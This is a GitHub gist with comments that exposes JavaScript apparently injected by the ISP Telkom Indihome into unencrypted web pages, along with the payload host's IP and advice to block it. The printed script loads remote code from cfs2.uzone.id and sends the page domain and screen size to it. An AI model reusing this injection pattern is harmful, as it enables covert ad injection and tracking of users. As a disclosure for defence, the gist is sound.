Skip to content

Instantly share code, notes, and snippets.

@donnykurnia

donnykurnia/gist:2356dad4119ce85d18d18708914c60e3

Last active June 29, 2022 04:35
Show Gist options
  • Star 18 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
  • Save donnykurnia/2356dad4119ce85d18d18708914c60e3 to your computer and use it in GitHub Desktop.
Save donnykurnia/2356dad4119ce85d18d18708914c60e3 to your computer and use it in GitHub Desktop.
Download ZIP
Injection code from Telkom Indihome. This code will replace </body> at the end of webpage with the code below. The content may varied, but the main payload is loaded from cfs2.uzone.id
Raw
gistfile1.txt
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnCgur28FUm401VrTNseDf2JlEA6ZiOk%2ffQK22KycK5kPdVDjpnejkM9P73Pe7Y6EuuaOitYkmzmKNO8RUzaFdaIXn6R7NkvKk9cKCHQzyvNXXPs%2bsueqLp2EKbC6X0Nu38%2fmvVexzHBsuqHkiQG%2bNd%2bm8E%2f1Gq6XVEDRBd4yBsks3piKPJIEbKaNRdQVxqlbqy5Bs6h0iSFn8zyf11ihllrf6ZNmrJse7MMGOa5Bg8V4gb29r7%2bHjvRblYlXTzoDaVMg79rr8%2fNSZ6ssVfsxi0UIiVvCjFalmdmUa4D3V21bRqM4cgubmchEbbS%2bil%2bkh%2bMxt3Lc4cILEYiziKexsYIRCUr4wR%2fPBUNQ0j4IIx1jEuAgOLeRdwvvw4aFM0V1i21bvKCvX8DaMIllnngEEJ09Ev%2fVl90I1UyrYKv6AaTOlPRBinecqub0KT%2flfLk3J5BMJsGhRjFCfISXqn01lRdvFPPMPwF0W10PRF8Of4%2feqOmNt6%2f1%2bIe66Xn2XLzyo%2fXuwHgr8%2fESw2BJ%2fexkP13jBCMQ6mGWGfQ671Tl0qDCRxz3%2fSr7a%2fgD3rwBAepraDryNlMplNKwfDkn1RshIR2yOHd%2fT9f%2bWyzvKgo2q%2bBVg19biKxt2MA%2b51lkpH9op3ufeUcUr06SkECqC57ZaT0Gy%2btFzIpw7WrVWNOUR2IagZkIGRtvs8fT78yLbMJYt7QL2KA1NeaqJ1oxvPiRhbpzwbaEvCh2IpkWW4arhunYT9DWgF1jaNRjn1c6n%2fzCUZvEw8o0sgvMEHBsLP0VK4Q%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
Raw
gistfile2.txt
cfs2.uzone.id ip address is 180.250.66.131
You just need to block this ip address in your router firewall or PC firewall, and the ads will be gone.
Shame on you, Telkom Indonesia.
@maulvi
Copy link

maulvi commented Aug 12, 2021
edited

Inikah yang menyebabkan Ubuntu repository (non secure http) jadi gak bisa diakses?

saya pernah ngalamin juga, terkadang kalo lagi kumat biasanya gak bisa akses http mau update repo harus pake proxy

@ifaniqbal
Copy link

@ifaniqbal kemungkinan karrna setting firewall atau proxy yg digunakan

https://stackoverflow.com/a/10349895/141177

Inikah yang menyebabkan Ubuntu repository (non secure http) jadi gak bisa diakses?

saya pernah ngalamin juga, terkadang kalo lagi kumat biasanya gak bisa akses http mau update repo harus pake proxy

Makasih @donnykurnia dan @maulvi. Saya tadi lapor via web indihome, laporannya "tidak bisa update Linux, repo berikut ini erro connection failed". Sudah diselesaikan oleh pihak telkom dengan memindahkan ke jaringan yang tidak "lemot".

Pihak telkom bilang, kalau dapat IP yang di bawah ..*.10 biasanya lemot. Saya dipindahkan ke IP 11 dan hasilnya lancar. Cek IP nya bisa via speedtest

image

Sekarang sudah bisa lancar sudo apt update

Hit:1 https://download.docker.com/linux/ubuntu hirsute InRelease
Hit:2 https://brave-browser-apt-release.s3.brave.com stable InRelease                                                                      
Hit:3 https://mirror.amscloud.co.id/ubuntu hirsute InRelease                                                                               
Hit:4 https://dl.winehq.org/wine-builds/ubuntu hirsute InRelease                                                                           
Hit:5 https://mirror.amscloud.co.id/ubuntu hirsute-security InRelease                                                                      
Hit:6 https://mirror.amscloud.co.id/ubuntu hirsute-updates InRelease                                                                       
Hit:7 https://mirror.amscloud.co.id/ubuntu hirsute-backports InRelease                                                                     
Hit:8 http://ppa.launchpad.net/linrunner/tlp/ubuntu hirsute InRelease                                                        
Hit:9 http://apt.pop-os.org/proprietary hirsute InRelease                                                                        
Hit:10 http://ppa.launchpad.net/system76/pop/ubuntu hirsute InRelease                                                            
Hit:11 https://download.sublimetext.com apt/stable/ InRelease                   
Hit:12 http://ppa.launchpad.net/ubuntuhandbook1/apps/ubuntu hirsute InRelease

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment